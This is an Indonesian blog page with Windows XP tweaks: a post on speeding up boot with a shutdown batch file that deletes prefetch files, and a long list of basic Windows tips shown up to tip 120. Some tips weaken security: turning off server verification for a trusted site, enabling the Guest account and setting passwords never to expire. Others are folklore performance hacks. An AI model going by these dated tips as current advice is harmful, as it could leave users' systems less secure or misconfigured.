3. Tunggu beberapa saat hingga proses scan selesai. Jika ditemukan file system yang rusak, maka anda akan dipandu untuk memperbaikinya.

Mempercepat booting Win-XP

2008-03-24T21:29:00.000-07:00

Pertama nemu tutorial ini jadi penasaran gimana hasilnya, eh pas dicoba ternyata boljug. Habis... suka kesel juga sih sewaktu nungguin login page yang lama ngilang Argh

Ikutin aja cara ini:

1. Buka aplikasi Notepad (C:\WINDOWS\NOTEPAD.exe).
2. Ketik: "del c:\windows\prefetch\ntosboot-*.* /q" (tanpa tanda kutip) lalu save as dengan nama file "ntosboot.bat" ke dalam C:\.

3. Dari START menu, jalankan "Run..." dan ketik "gpedit.msc".

4. Setelah muncul kotak Group Policy, di kotak sebelah kiri bagian Computer Configuration klik dua kali Windows Settings lalu klik lagi pilihan Scripts (Startup/Shutdown). Lalu, di kotak sebelah kanan klik dua kali "Shutdown".

5. Pada kotak Shutdown Properties, klik "Add...", "Browse..." pada kotak "Script Name:". Cari lokasi file yang tadi di save di "C:\ntosboot.bat", klik Open -> OK -> Apply -> OK lagi dan keluar.

6. Dari START menu, jalankan "Run..." dan ketik "devmgmt.msc".

7. Klik dua kali "IDE ATA/ATAPI controllers".

8. Klik kanan "Primary IDE Channel" dan pilih "Properties".

9. Setelah muncul kotak "Primary IDE Channel Properties"pindah ke tab "Advanced Settings". Pada "Device Type" di bagian "Device 1" ganti pilihan "Auto Detection" menjadi "None", klik OK.

10. Klik kanan pada "Secondary IDE Channel", pilih "Properties" dan ulangi lagi langkah 9.

11. Reboot/restart komputer Anda.

150 tips dan trik dasar Windows

2008-03-24T21:12:00.000-07:00

150 tips dan trik dasar Windows

Setelah menginstalasi Windows dan aplikasi-aplikasi lain yang dibutuhkan ke dalam komputer, ada beberapa hal yang seharusnya Anda lakukan. Di antaranya adalah melakukan beberapa hal untuk mempercepat serta mempermudah kinerja komputer. Misalnya, mengatur agar komputer bisa restart lebih cepat, atau memunculkan menu tersembunyi, menggunakan shortcut untuk akses lebih cepat dan lain sebagainya.
Semua hal di atas adalah sebagian kecil dari tip dan trik dasar Windows yang kami sampaikan berikut ini. Semua tip dan trik di sini kami padukan menjadi 150 langkah mudah dan aman untuk dilakukan. 150 tip dan trik, termasuk beberapa panduan langkah demi langkah yang mudah berikut ini, akan menjadikan komputer Anda lebih nyaman bekerja. Tentu saja, akhirnya, produktivitas Anda di depan komputer kian berkembang.
Sebuah komputer yang nyaman saja belum cukup tanpa dibarengi peningkatan sisi keamanan. Hal ini penting, sebab koneksi ke jaringan, Internet maupun ke komputer lain, sedikit banyak pasti berisiko. Mulai dari penyebaran virus hingga pengambilan data kita oleh orang yang tidak berhak. Untuk itu, kami sertakan pula beberapa tip dasar untuk memperbaiki keamanan pada Windows.
Beberapa tip dan trik maupun panduan langkah demi langkah dalam tulisan ini menggunakan bantuan program tertentu yang bisa di-download dari beberapa situs di Internet. Namun untuk memudahkan Anda, seperti biasa semua program yang disebutkan dalam tulisan berikut ini disertakan dalam CD PC Media. Tentu saja, semua program sudah diuji di labs PC Media.
Instalasi program yang ada dalam tulisan ini kebanyakan berasal dari situs resmi Microsoft. Sehingga kecil kemungkinannya program-program ini menyebabkan error di PC. Jadi jangan ragu, ikuti terus tip dan trik dasar pada Windows yang jarang terungkap!
Instalasi Windows yang Mudah dan Menyenangkan
01. Back-up dahulu registry sebelum diedit. Caranya, klik Start|Run, ketik regedit. Setelah muncul window registry, pilih menu File|Export. Pada bagian Export range, pilih All dan tentukan nama file, akhiri dengan klik tombol Save.
02. Banyak program yang sebenarnya terinstalasi dalam Windows, namun tidak aktif. Untuk mengaktifkannya, masuk ke Control Panel|Add/Remove Windows Component dan beri tanda centang pada program yang belum aktif.
03. Sebelum menginstalasi program baru atau melakukan perubahan setting Windows secara keseluruhan, lebih baik buat Restore Point secara manual dahulu. Caranya, Klik Start|All Programs|Accessories|System Tool|System Restore dan klik Create a restore point.
04. Jika Anda memutuskan untuk menginstalasi Windows Update yang sebelumnya sudah didecline, masuk ke Control Panel|System, pilih tab Automatic Updates dan klik Restore Declined Updates.
05. Untuk mengatur Windows update berjalan sesuai dengan kebutuhan Anda, atur dulu Windows Update. Caranya, buka System di Control Panel dan klik tab Automatic Updates. Atur enable atau disable option Keep my computer up to date.
06. Bila Anda tidak memiliki CD bootable, jangan khawatir. Microsoft sudah menyediakan tool gratis untuk membuat disket booting di http://support.microsoft.com/?kbid=310994.
07. Jika saat instalasi Windows tiba-tiba terhenti, matikan komputer dan lepas card tambahan. Misalnya sound card. Instal ulang dan pasang kembali card setelah instalasi selesai.
08. Untuk menambahkan System Administration Tools ada Start Menu, klik kanan Start|Properties. Masuk dalam tab Start Menu dan klik Customize kemudian masuk dalam tab Advanced. Geser ke bawah dan beri tanda centang pada option Display on the All Programs and the Start Menu.
09. Untuk menginstal Back up Utility pada Windows XP Home Edition carilah file ntbackup.msi di direktori\valudeadd\msft\ntbackup\ di CD instalasi Windows XP. Jalankan file tersebut dan ikuti langkahlangkahnya.
10. Windows XP secara otomatis akan me-highlight setiap program baru yang ter-install. Cara menghilangkannya, klik kanan Start|Properties. Masuk ke tab Start Menu|Customize, kemudian klik tab Advanced dan hilangkan tanda centang pada opsi Highlight newly installed program.
11. Untuk tampilan film atau game terbaik pada komputer, pastikan bahwa DirextX terbaru sudah terinstalasi dengan baik. Lihat versi terbarunya di www.microsoft.com/windows/directx.
12. Ada kalanya hardware yang akan dipasang belum support Plug-and-Play. Untuk itu, gunakan Add Hardware Wizard yang ada di Control Panel|System|Hardware untuk mendeteksinya.
--> TOP TIPS ! Mempercepat Kerja Komputer 13. Sebenarnya hanya dibutuhkan waktu tidak lebih dari 2 menit saja untuk masuk ke Windows sejak komputer dihidupkan. Namun, kadang terasa sangat lama. Untuk mempercepat loading Windows, ada beberapa hal yang bisa dilakukan. Misalnya, mengurangi icon di desktop serta tidak menggunakan wallpaper yang memakan banyak memory. Ganti wallpaper dengan background berwarna, serta gunakan Desktop Cleanup
Wizard yang ada bisa ditemui dengan klik kanan pada desktop untuk membersihkan icon. Jangan lupa juga, jalankan defrag secara berkala.
Jika Anda sering menambah atau mengurangi program di komputer, bersihkan registry secara rutin. Gunakan software bantu seperti Registry Mechanic dari situs www.winguides.com. Sayangnya, versi trial program ini hanya bisa digunakan memperbaiki sebanyak 6 sections saja.
Langkah lain yang perlu dilakukan adalah me-remove program yang di-load secara otomatis saat memulai Windows. Tentu saja, hanya program-program yang tidak dibutuhkan. Caranya, dengan menghapus semua isi folder startup dan membuka msconfig melalui Start|Run.
14. Gunakan fitur File and Transfer Setting Wizard untuk memindahkan file dan setting ke komputer baru. Caranya, klik Start|AllPrograms|Accessories|System Tools, kemudian jalankan File and Transfer Setting Wizard.
15. Gunakan pengecualian pada security setting di Internet Explorer, agar proses update melalui halaman Windows Update berjalan lancar. Caranya, buka Internet Option di menu Tools pada Internet Explorer. Klik tab Security, pilih Trusted Site dan klik tombol Sites. Isikan nama situs Windows Update, hilangkan tanda centang pada option Require server verification… dan klik OK.
16. Jika Anda kehilangan serial number Windows XP, gunakan freeware Magical Jelly Bean Keyfinder dari http://www.magicaljellybean.com/keyfinder.shtml.
17. Jika nama yang teregister dalam Windows XP Anda tidak sesuai, perbaiki melalui registry. Caranya, buka registry dan pilih MY Computer. Klik menu Edit|Find dan ketik RegOwner. Jika sudah ditemukan, klik kanan, pilih Modify dan isikan nama yang sesuai. Perubahan ini bisa juga dilakukan di key RegCompany.
Peningkatan Performa Internet dan Jaringan
18. Untuk men-share sebuah folder di komputer Anda ke jaringan, klik kanan folder tersebut dan pilih Properties. Klik tab Sharing dan enable option Share this folder on the network. Beri nama dan klik OK.
19. Buat sebuah icon My Network Places di desktop dengan mengklik kanan area kosong di dekstop dan klik Properties. Pilih tab Desktop|Customize Desktop. Kemudian buka tab General dan enable option My Network Places.
20. Ada cara mudah mengirim pesan ke komputer lain di jaringan, yakni menggunakan Console Message. Buka Control Panel|AdministrativeTools|Computer Management|Action|All Task|Send Console Message. Ketik teks yang hendak dikirim, tambahkan nama komputer yang hendak dituju dan klik Send.
21. Untuk mengatur Internet Connection Firewall (ICF), buka Network Connection di Control Panel, klik kanan koneksi yang ada dan klik Properties. Buka tab Advanced dan enable option Protect my computer and network by limitting or preventing access to this computer from Internet.
22. Atur Internet Connection Firewall (ICF) untuk setiap koneksi yang ada. Baik dial-up maupun broadband. Jika komputer Anda merupakan bagian dari jaringan yang terhubung ke Internet, pasang ICF hanya di komputer server.
23. Untuk mengetahui alamat IP Anda, masuk dalam DOS dengan mengetikkan command di Run. Kemudian ketikkan ipconfig /all.
24. Jika Anda menerima pesan dari Internet melalui Messenger, segera matikan. Caranya, masuk ke Contol Panel|Administrative Tools|Services, dan klik ganda Messenger kemudian Stop. Untuk mencegah supaya tidak terulang, atur supaya Messenger menjadi Disabled di bagian Startup.
25. Matikan Windows Messenger dengan melalui regedit. Buka HKEY_LOCAL_MACHINE\Software\Policies\Microsoft, kemudian pilih menu Edit|New|Key, dan beri nama Messenger. Kemudian buat key lagi dengan cara ini di dalam direktori Messenger dengan nama key-nya Client. Setelah itu, klik menu Edit|New|DWORD Value, dan beri nama Prevent-Run. Klik kanan value PreventRun, pilih Modify, isi angka 1 pada Value data, dan klik OK.
26. Untuk mengetahui informasi mengenai koneksi di komputer Anda, klik Start|All Programs|Accessories|System Tools|System Information. Pilih menu Tools|Net Diagnostics. Pada window yang terbuka kemudian pilih option Scan your system. Tunggu hingga proses selesai untuk melihat hasilnya.
27. Lindungi privasi dengan mencegah aplikasi Windows Media Player mengirim data mengenai komputer dan kebiasaan Anda menggunakan komputer melalui Internet ke alamat-alamat tertentu. Caranya mudah, Pada Windows Media Player, pilih menu Tools|Option. Buka tab Player dan disable option Aloww internet sites to uniquely your player.
28. Untuk mengunci komputer yang berada dalam sebuah network domain, tekan tombol Ctrl + Alt + Del bersamaan dan klik option Lock Computer. Untuk membuka kembali, tekan tombol Ctrl + Alt + Deldan masukkan password. Konfigurasi Windows yang Mudah dan Cepat.
29. Untuk men-disable fitur autorun, klik kanan pada icon drive CD, pilih Properties dan masuk dalam tab AutoPlay. Kemudian disable autoplay untuk setiap jenis file yang tertera pada daftar.
30. Gunakan program Microsoft Clear Type Tuning Control dari http://www.microsoft.com/typography/cleartype/ untuk mengatur Clear Type pada komputer.
31. Untuk melihat system file yang secara default di-hidden oleh Windows XP, pilih tab View dalam menu Tool|Folder Option dalam Windows Explorer. Enable Display the content of system folder.
32. Untuk meletakkan icon volume control di taskbar, masuk dalam Control Panel|Sound and Audio dan klik tab Volume. Enable Place volume control in the Taskbar dan klik OK.
33. Atur tombol Power di keyboard melalui Control Panel|Power Option di tab Advanced. Tentukan pengaturan tombol Power ini dengan memilih option yang tersedia.
34. Atur supaya Windows membersihkan Pagefile saat shut down demi keamanan. Caranya, buka registry dan masuk dalam direktori HKEY_LOCALMACHINE\SYSTEM\CurrentControlSet\Control|Session Manager. Edit value pada key Clear-PageFileAtShutdown menjadi 1. Konsekuensinya, proses shut down akan berlangsung sedikit lebih lama.
35. Atur supaya Windows menampilkan ekstensi setiap file. Caranya, di Windows Explorer, pilih menu Tool|Folder Option dan tab View. Hilangkan tanda centang di option Hide file extentions for known file types.
--> STEP BY STEP
36. Menghapus Komponen yang Terinstal Banyak komponen Windows yang tidak muncul di Add/Remove Windows Component sehingga tidak bisa di-uninstall.
1. Buka Notepad dan pilih menu File|Open. Arahkan ke folder Windows\inf. Isi nama file sysoc.inf. Klik Open untuk membuka file ini.
2. Pilih menu Edit|Replace. Ketik Hide pada kolom Find, namun kosongkan kolom Replace With, klik Replace All. Tujuannya untuk menghapus semua kata Hide dalam file ini. Setelah selesai, tutup dan simpan file.
3. Buka Control Panel dan pilih Add/Remove Programs. Kemudian pilih Add/Remove Windows Component, pada windows yang keluar kemudian akan tampak beberapa komponen yang sebelumnya tersembunyi.
37. Ubah gambar pada welcome screen dengan cara masuk ke User Account di Control Panel. Buka account Anda dan klik Change my picture. Tentukan gambar pilihan Anda dengan mengklik Browse untuk gambar di harddisk atau memilih di antara gambar yang sudah tersedia.
38. Jika lebih menyukai tampilan Start Menu versi lama, Anda bisa mengubahnya dengan mengklik kanan tombol Start, pilih Properties. Pilih Classic Start Menu dan klik Customize untuk mengatur isinya.
39. Untuk menyempurnakan tampilan klasik pada Start Menu, klik kanan desktop dan pilih Properties. Buka tab Themes, dan pilih Windows Classic dari Theme list.
40. Tambahkan image pada sebuah folder, sehingga image tersebut yang akan tampak saat Windows Explorer dalam tampilan thumbnails. Caranya, klik kanan folder yang hendak diolah, pilih Properties. Klik tab Customize dan klik Choose Picture. Pilih sebuah gambar dan klik Open|OK.
41. Sesuaikan kapasitas Recycle Bin dengan mengklik kanan icon Recycle Bin dan memilih Properties. Isi kapasitas yang Anda inginkan dan klik OK.
42. Pada saat View di-set Details di Windows Explorer, klik kanan header salah satu kolom untukmengatur kolom apa saja yang ditampilkan. Klik More bila perlu mengatur setting lainnya.
43. Untuk menambahkan program yang paling sering Anda gunakan dalam Quick Launch, drag icon program tersebut dalam Quick Launch.
44. Tambahkan address bar pada taskbar, sehingga mempercepat akses ke sebuah alamat di Internet. Caranya, klik kanan taskbar, pilih Toolbar|Address. Klik ganda untuk membuka dan menutupnya.
45. Jadikan tampilan Windows Explorer seperti tampilan pada window My Computer. Caranya, klik kanan icon Window Explorer dan pilih Properties. Pada Target area, setelah %SystemRoot%\explorer.exe tambahkan /n, /e, /select, C:\ dan klik OK.
46. Untuk menambahkan sebuah shortcut program di baris paling atas Start Menu, klik kanan icon-nya di Start Menu kemudian klik Pin to Start Menu. 47. Supaya sebuah drive atau folder dapat masuk dalam menu Send To, drag shortcut-nya ke folder \Documen Anda Setting\\SendTo.
48. Mencari folder SendTo? Klik saja Start|Run dan ketik SendTo kemudian klik OK.
49. Untuk mengosongkan daftar dokumen dalam folder My Recent Document di Start Menu, klik kanan Start, pilih Properties. Klik Customize dan buka tab Advanced kemudian klik tombol Clear list. Supaya tidak ada lagi yang muncul di My Recent Documents, disable option List my most recently opened documents.
--> STEP BY STEP 50. Fast User Switching Dengan Fast User Switching, seorang user tidak perlu logoff sementara user lain login.
1. Untuk meng-enable Fast User Switching, masuk dalam Control Panel dan pilih User Accounts. Klik option Change the way user log on or off, dan enable Use Fast User Switching.
2. Supaya koneksi dial-up tetap berjalan meski Fast User Switching di-enable, masuk ke registry di direktori HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon.
3. Klik kanan pada panel sebelah kanan dan pilih New |String Value. Beri nama KeepRasConnections dan beri nilai 1. Restart komputer.
51. Untuk melihat isi sesungguhnya folder My Recent Documents, klik Start|Run, kemudian ketikkan %UserProfile%\Recent.
Pengaturan Multiple User 52. Untuk berpindah antar user account, tekan tombol Ctrl+Alt+Del, kemudian pada window Task Manager yang terbuka, pilih tab Users. Klik kanan nama user yang hendak dipakai dan klik tombol Connect.
53. Tambahkan account Guest supaya orang lain bisa menggunakan komputer Anda. Caranya, buka User Accounts di Control Panel, klik Guest|Turn On the Guest Account.
54. Ingatlah untuk selalu login sebagai System Administrator sebelum melakukan perubahan yang berimbas pada performa komputer.
55. Untuk meng-copy user profile, masuk dalam Control Panel|System. Masuk dalam tab Advance dan klik tombol Setting di User Profiles. Sorot profile yang hendak dicopy, kemudian klik Copy to dan tentukan lokasi penyimpanan profile. Untuk mengubah permission, klik tombol Change.
56. Ganti Welcome screen dengan login dialog untuk menambah tingkat keamanan. Caranya, masuk dalam User Accounts di Control Panel, pilih option Change the way user log on or off serta disable Welcome screen.
57. Gunakan folder Shared Documents untuk menyimpan filefile yang bisa dibuka orang lain dalam jaringan. Folder ini bisa ditemui di My Documents\Other Places area.
58. Pada Windows XP Pro Edition, password bisa kadaluarsa jika lama tidak digunakan login. Untuk menghindarinya, atur supaya Windows tidak melakukan hal tersebut. Caranya, klik Start|Run, ketikkan userpasswords2 dan Enter. Buka tab Advanced dan pilih Advanced user management, klik tombol Advanced dan pilih Local Users and
Groups. Klik kanan nama user dan pilih Properties. Buka tab General dan enable option Password never expires.
59. Beri nama setiap partisi atau drive yang ada dengan nama yang berbeda. Hal ini penting untuk mempermudah pencarian file. 60. Buat sebuah password reset disk sebagai disket darurat saat kehilangan password. Caranya, masuk ke Control Panel dan buka User Account. Pilih account Anda dan pilih Prevent a forgotten password untuk memulai wizard.
Pengaturan File dan Folder 61. Buat sebuah compressed folder dengan cara mengklik kanan area kosong pada desktop, dan pilih New|Compressed (zipped) Folder. Beri nama dan drag and drop file yang hendak dikompres dalam folder tersebut.
62. Sebuah compressed folder bisa dilindungi dengan password. Caranya, buka menu File|Add a Password. Isikan password Anda dan isi sekali lagi untuk konfirmasi.
63. Sebuah compressed folder tetap bisa ditambah isinya dengan cara drag and drop file yang hendak dikompres ke dalamnya.
64. Saat menjalankan Disk Cleanup, pilih option Compress old files untuk mengompresi file-file yang sudah tidak dibutuhkan, sehingga kapasitas harddisk bisa dihemat.
65. Enkrip atau acak file bisa dilakukan di Windows XP Pro Edition dengan mengklik kanan My Computer, pilih Properties. Buka tab General dan klik Advanced. Aktifkan option Encrypt contents to secure data.
66. Cara termudah mengubah nama file atau folder adalah dengan memilihnya, kemudian menekan tombol F2.
67. Supaya Anda bisa berpindah antar folder dengan cepat, terutama pada folder-folder yang sering dibuka, buatlah shortcut untuk setiap folder yang sering diakses.
68. Reset file association dengan cara menhakan tombol Shift saat mengklik kanan sebuah file. Pilih Open With… Pilih program yang hendak Anda gunakan untuk membuka file tersebut dan enable option Open use the selected program to open this kind of file. Kemudian klik OK.
69. Sesuaikan kapasitas penyimpanan file musik dengan cara membuka Windows Media Player dan memilih menu Tools|Options. Buka tab Copy Music dan sesuaikan ukuran kapasitas dengan menggeser slider.
70. Jika Anda menyimpan semua dokumen dalam folder My Documents, maka semua file tersebut lebih mudah di-back-up serta tidak terpengaruh system restore.
71. Jika sebuah file hasil copy dari CD tidak dapat diakses, maka hilangkan atribut Read only. Caranya, klik kanan file tersebut dan pilih Properties. Hilangkan tanda centang pada option Read only.
72. Aturlah tampilan setiap folder dengan mengklik kanan folder tersebut pada My Computer. Pilih Properties dan klik Customize. Pilih template yang tersedia atau pilih gambar sesuai dengan keinginan Anda. Klik OK untuk menyimpan hasil setting.
73. Anda bisa me-rename beberapa file sekaligus yang memiliki karakter sama dalam folder yang sama juga. Misalnya kumpulan foto atau image. Caranya, pilih semua file yang hendak di-rename, klik kanan file pertama dan klik Rename. Beri nama,misalnya Koleksi.JPG, maka semua file yang lain akan berubah namanya menjadi Koleksi (1).JPG, Koleksi (2).JPG, dan seterusnya.
--> STEP BY STEP
74. Mengirim Faks Tahukah Anda, bahwa Windows XP memiliki tool untuk mengirim dan menerima faks?
1. Buka Control Panel, pilih Add/Remove Program dan klik Add/Remove Windows Component. Enable Fax Services dan klik Next.
2. Klik Start|All Programs|Accessories|Communication|Fax|Fax Console untuk menjalankan Fax Configuration Wizard. Atur semua setting, termasuk nomor faks dan modem yang digunakan serta pengaturan incoming fax.
3. Buat semua faks dari Fax Console. Periksa semua isi sebelum dikirim, termasuk setting dan sebagainya.
Mengatur Kualitas Cetak 75. Anda bisa mencetak beberapa foto bersamaan, sekaligus mengatur layout serta option lainnya dengan cara mudah. Pertama, buka file-file foto dalam folder My Pictures, kemudian pilih menu File |Print. Akan muncul Photo Printing Wizard. Atur printer yang hendak digunakan dan layout yang akan dipakai. Beberapa printer memungkinkan mencetak beberapa foto dalam satu kertas.
76. Daripada harus mengatur setting printer setiap kali menggunakannya, buatlah copy printer Anda. Atur masing-masing dengan option berbeda sesuai yang Anda butuhkan.
77. Anda bisa menggunakan karakter yang tidak ada di keyboard, namun bisa digunakan dalam Windows dengan fitur Character Map. Untuk membukanya, Anda bisa menemukan di Start|All Programs|Accessories|System Toolss|Character Map. Atau ketik “charmap” tanpa tanda petik di Start|Run.
78. Untuk meng-capture sebuah adegan di file movie menjadi sebuah image, putarlah film tersebut dan tekan tombol Stop saat adegan yang diinginkan. Klik Take Picture, simpan di folder Anda dan beri nama.
Memunculkan Penampakan Fitur Tersembunyi 79. Anda tertarik dengan musik pembuka Windows yang orisinal? Temukan file-nya di \windows\oobe\system32\images\tittle.wma.
80. Ada dua edisi Windows Plus! yang beredar, yakni Microsoft Plus! for Windows dan Digital Media Edition (DME). Simak www.microsoft.com/windows/plus/PlusHome.asp dan coba versi trial DME.
81. Ketikkan “iexpress” tanpa tanda petik pada kotak dialog Start|Run. Anda akan menemukan sebuah utility untuk mengompres dan membuat file self extraction.
82. Anda akan menemukan beberapa tool yang kurang populer, namun punya kelebihan luar biasa. Tool-tool tersebut bisa ditemui di folder support\tools dalam CD instalasi Windows XP. Gunakan program suptools.msi untuk menginstalasi tool-tool tersebut dalam komputer Anda.
83. Ada banyak wizard atau stepby-step di Windows. Untuk mengetahui wizard apa saja, buka Help and Support dan ketikkan “Wizard” tanpa tanda petik pada kolom pencarian. Windows akan memunculkan daftar wizard yang tersedia. Anda tinggal memilihnya.
84. Untuk membuat karakter sendiri, klik Start|Run dan ketikkan Eudcedit. Buat sesuai keinginan Anda, asalakan masih dalam ukuran 64x64 grid. Simpan dengan memilih menu Edit|Save Character.
85. Untuk meletakkan karakter dalam Character Map ke dalam dokumen, Anda cukup membuka Character Map dan memilih karakter tersebut. Kemudian Anda tinggal mengcopy dan paste-nya ke dalam dokumen Anda.
Menghias Desktop 86. Anda bisa mengatur pointer mouse sesuai keinginan dengan membuka tab Pointer dalam menu Mouse di Control Panel. Klik Browse untuk mencari pointer yang sesuai keinginan Anda.
87. Untuk menampilkan daftar dokumen yang terakhir diakses di Start Menu pada Windows XP Home Edition, klik kanan pada tombol Start dan pilih Properties. Klik Customize, buka tab Advanced dan enable option List my most recently opened documents.
88. Jika Anda ingin agar tampilan Windows Explorer terbuka penuh hingga menutupi taskbar, tekan tombol F11.
89. Anda bisa membuat shortcut key atau penekanan tombol tertentu untuk mengakses sebuah program. Caranya, klik kanan icon program tersebut dan pilih Properties. Buka tab Shortcut dan tentukan tombol mana yang Anda gunakan untuk mengakses program
tersebut. Secara otomatis Windows akan menambahkan tombol Ctrl+Alt+ pilihan Anda sebagai shortcut key.
90. Urutkan secara alfabet, semua program yang ada di Start Menu untuk memudahkan pengaksesan. Caranya, klik Start|All Programs, klik kanan salah satu program yang ada dan pilih Sort by Name.
91. Munculkan penampakan icon indikator koneksi broadband atau dial-up pada system tray untuk mempermudah kontrol. Caranya, buka My Network Places, pilih View Networks Connections, klik kanan koneksi yang Anda gunakan dan pilih Properties. Ubah option Show icon in notofication area when connected menjadi enable.
92. Anda bisa mengedit Start Menu sesuai dengan kebutuhan. Baik menambah, mengurangi, atau bahkan mengubah namanya. Caranya, klik kanan Start dan pilih Open atau Open All Users. Atur setiap shortcut yang tersedia sesuai kebutuhan.
93. Anda bisa membuka beberapa program secara bersamaan dengan menekan tombol Shift, sementara mengklik program yang ada dalam Start Menu.
94. Untuk menghilangkan nama icon pada desktop, klik kanan icon tersebut, dan pilih Rename. Tekan tombol Alt dan numeric key 255. Kemudan tekan Enter.
95. Anda bisa menghilangkan tanda panah pada icon shortcut di desktop. Caranya, masuk ke registry editor dengan mengetik “regedit” tanpa tanda petik di kotak dialog Start|Run. Masuk ke dalam direktori HKEY_CLASSES_ROOT\Lnkfile. Hapus value IsShortcut. 85
--> TOP TIPS !
96. Daftar Shortcut Berikut ini beberapa shortcut yang paling banyak digunakan saat bekerja sehari-hari menggunakan Windows.
[Windows] + [L] Lock komputer [Windows] + [U] Menampilkan Utility Manager [Windows] + [R] Menampilkan Run [Windows] + [F] Menampilkan window pencarian [Windows] + [E] Membuka My Computer [Windows] + [D] Mematikan atau mengaktifkan Toggle Desktop [Windows] + [M] Minimize semua window [Windows] + [Shift] + [M] Restore semua window yang di-minimize [Windows] + [Ctrl] + [F] Mencari komputer dalam jaringan [Windows] + [F1] Menampilkan halaman Help [Windows] + [Break] Memunculkan window System
Properties [Windows] + [Tab] Scroll tombol di Taskbar Jika Anda menggunakan keyboard lama yang tidak dilengkapi dengan tombol Windows, gunakan paduan tombol Ctrl + Esc.
97. Anda bisa meng-enable atau disable grouping beberapa file dalam satu program. Caranya, klik kanan taskbar dan pilih Properties. Beri atau hilangkan tanda centang pada option Groups similar taskbar button.
98. Anda bisa menghilangkan atau menampilkan icon di desktop dengan mengklik kanan desktop dan memilih Arrange Icons By|Show Desktop Icons.
99. Anda bisa membuat custom toolbar dengan mengklik kanan taskbar, memilih Toolbars|New Toolbar. Atur sesuai dengan keinginan Anda, misalnya menjadikan My Documents sebagai toolbar di taskbar supaya mudah dan cepat diakses.
100. Klik kanan Start Menu, pilih Properties, jika tidak menggunakan Classic Start Menu, klik Customize dan buka tab Advanced. Ada beberapa munu yang bisa diaktifkan dengan memberi tanda centang pada option yang ada. Mulai dari Scroll Programs hingga memunculkan penampakan beberapa fitur dalam Start Menu. 101. Anda bisa membuka sebuah situs tanpa membuka browser terlebih dahulu. Caranya, ketikkan alamat lengkap situs yang hendak dibuka di kotak dialog Start|Run. Misalnya www.pcmedia.co.id. Kemudian tekan Enter.
102. Di setiap menu dalam Windows terdapat huruf yang bergaris bawah sebagai patokan penggunaan navigasi keyboard. Misalnya menu File bisa dibuka dengan menekan tombol Alt+F. Anda bisa menonaktifkan atau mengaktifkan fitur yang ditandai dengan garis bawah ini. Caranya, klik kanan area kosong di desktop. Kemudian buka tab Appereance, dan klik tombol effects. Atur tanda centang pada option Hide underlined letter for keyboard navigation until I press the [Alt] key.
103. Atur supaya komputer mengeluarkan suara peringatan saat tombol Caps Lock, Num Lock atau Scroll Lock diaktifkan. Caranya, Buka Control Panel, masuk dalam Accessibility Option. Buka tab Keyboard dan enable option Use Toggle-Keys.
104. Untuk meng-enable Hibernate dalam Windows XP saat menekan Turn Off di Start Menu, tahan tombol Shift. Maka tombol Stand by pada kotak dialog Shut Down akan berubah menjadi Hibernate.
105. Jika hardware Anda support Hibernate, aktifkan segera fitur ini. Caranya, buka Control Panel dan buka Power Options. Klik tab Hibernate dan beri tanda centang pada option Enable Hibernate. Jika hardware Anda tidak support Hibernate, tab ini tidak bisa ditemui.
Memperbaiki Kinerja Komputer 106. Tambah kecepatan komputer Anda dengan menghilangkan penampakan yang bagus namun memakan banyak waktu, yakni animasi. Caranya, buka Control Panel, dan klik ganda System. Klik tab Advanced dan tekan tombol Performance Settings. Kemudian enable option Adjust for the best performance.
107. Untuk mengurangi waktu booting yang terasa lama, atur di BIOS agar booting dimulai dari harddisk baru kemudian CD atau floppy drive pada pilihan berikutnya.
108. Atur supaya Windows hanya akan me-load program yang dibutuhkan saja saat mulai berjalan supaya waktu loading lebih cepat dan kerja komputer lebih ringan. Ketikkan “msconfig” tanpa tanda petik di kotak dialog Run dan tekan Enter. Pada tab General, pilih option Selective Startup, kemudian buka tab Startup dan nonaktifkan semua program yang tidak perlu.
109. Anda bisa memonitor penggunaan processor dengan menekan tombol Ctrl+Alt+Del untuk membuka Task Manager. Kemudian minimize window tersebut, Anda akan melihat grafik penggunaan kapasitas processor di system tray.
110. Untuk meningkatkan kecepatan menyimpan data di USB ZIP drive, buka My Computer dan klik kanan drive ZIP tersebut. Pilih Properties, buka tab Hardware klik Properties, kemudian buka tab Policies dan aktifkan option Optimize for Performance.
111. Untuk mempercepat tampilan Start Menu, buka Registry Editor (ketikkan “regedit” tanpa tanda petik di kotak dialog Run). Masuk dalam direktori HKEY_CURRENT_USER\Control Panel\Desktop. Klik ganda value yang bernama MenuShowDelay, ganti angka yang ada menjadi 100. Dengan cara ini, maka delay tampilan Start Menu semakin singkat.
112. Ada cara cepat mematikan komputer. Tekan tombol Ctrl+Alt+Del, pada windows Task Manager yang muncul, tekan menu Shut Down dan tahan tombol Ctrl saat mengklik Turn Off. Pastikan dulu semua dokumen telah di-save.
113. Anda bisa melihat grafis yang menampilkan performance komputer berdasarkan beberapa indikator. Misalnya penggunaan processor, memory, dan lain sebagainya. Caranya, buka Control Panel dan klik ganda Administrative Tools. Buka fitur Performance.
114. Anda juga bisa menambahkan beberapa indikator lain dalam fitur Performance (di nomer 13) dengan mengklik icon + dan memilih indikator baru apa saja yang hendak ditampilkan.
115. Anda bisa menggabungkan sebuah file registry atau .reg ke dalam registry Windows Anda, dengan mengklik ganda file tersebut. Untuk mengetahui fungsinya, buka dengan notepad.
116. Jika Anda menggunakan RAM sebesar 512 MB, atur agar Windows tidak membuat paging ke disk agar performance komputer semakin meningkat. Caranya, buka Registry Editor dan masuk dalam direktory HKEY_LOCAL_MACHINE\SYSTEM|Current ControlSet\Control\SessionManager\MemoryManagement. Ubah value DisablePagingExecutive menjadi 1.
117. Gunakan Bootcfg.exe untuk mengedit boot.ini Windows XP. Caranya, ketikkan “cmd” tanpa tanda petik dalam kotak dialog Run untuk masuk dalam DOS Prompt, dan ketikkan bootcfg: /? setelah muncul prompt untuk memperoleh informasi mengenai fitur dalam program ini.
118. Untuk memilih operating system dalam yang digunakan dalam sebuah komputer yang memiliki partisi drive, buka Control Panel, masuk dalam System kemudian buka tab Advanced. Klik tombol Startup and Recovery Setting kemudian Edit.
119. Gunakan utility klasik chkdsk untuk men-scan harddisk dan memperbaiki error yang ditemui. Caranya, klik Start |Run dan ketikkan “chkdsk c:/f” tanpa tanda petik untuk men-scan dan memperbaiki drive C. Jika Anda ingin tahu lebih banyak tentang fitur dalam chkdsk, ketikkan “chkdsk /?”. 120. Anda bisa melewati Scanner and Camera Wizard saat memasang kamera digital. Untuk mengaksesnya, gunakan Windows Explorer atau My Computer. Kamera digital Anda akan tampil sebagai drive.
